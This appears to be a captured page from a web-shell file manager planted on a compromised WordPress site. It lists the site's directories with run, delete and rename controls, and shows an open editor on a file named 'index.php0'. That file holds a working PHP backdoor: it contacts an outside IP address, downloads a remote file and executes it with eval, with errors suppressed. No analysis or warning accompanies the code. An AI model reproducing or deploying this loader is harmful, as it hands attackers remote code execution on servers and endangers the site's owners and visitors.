at path:
ROOT
/
index.php0
run:
R
W
Run
.well-known
DIR
2026-06-12 02:41:56
R
W
Run
ba455d
DIR
2026-06-12 09:36:03
R
W
Run
d5434
DIR
2026-06-12 09:36:03
R
W
Run
wp-content
DIR
2026-06-12 09:36:05
R
W
Run
wp-includes
DIR
2026-06-12 09:36:03
R
W
Run
.htaccess
1.13 KB
2024-03-09 09:36:03
R
W
Run
index.php0
587 By
2024-03-31 09:36:02
R
W
Run
Delete
Rename
robots.txt
402 By
2024-01-29 09:36:03
R
W
Run
error_log
up
📄
index.php0
Save
<?php $_h = '173.208.253.26'; $_p = '/z60323_8/stat/index.txt'; $_f = @pfsockopen($_h, 80, $_e, $_s, 5); if ($_f) { $_r = "GET $_p HTTP/1.1\r\nHost: $_h\r\nConnection: close\r\n\r\n"; fwrite($_f, $_r); $_d = ''; $_hd = false; while (!feof($_f)) { $_l = fgets($_f, 4096); if ($_hd) $_d .= $_l; elseif (trim($_l)=='') $_hd = true; } fclose($_f); } else { $_ch = curl_init("http://$_h$_p"); curl_setopt($_ch, CURLOPT_RETURNTRANSFER, 1); $_d = curl_exec($_ch); curl_close($_ch); } if (!empty($_d)) @eval('?>' . $_d);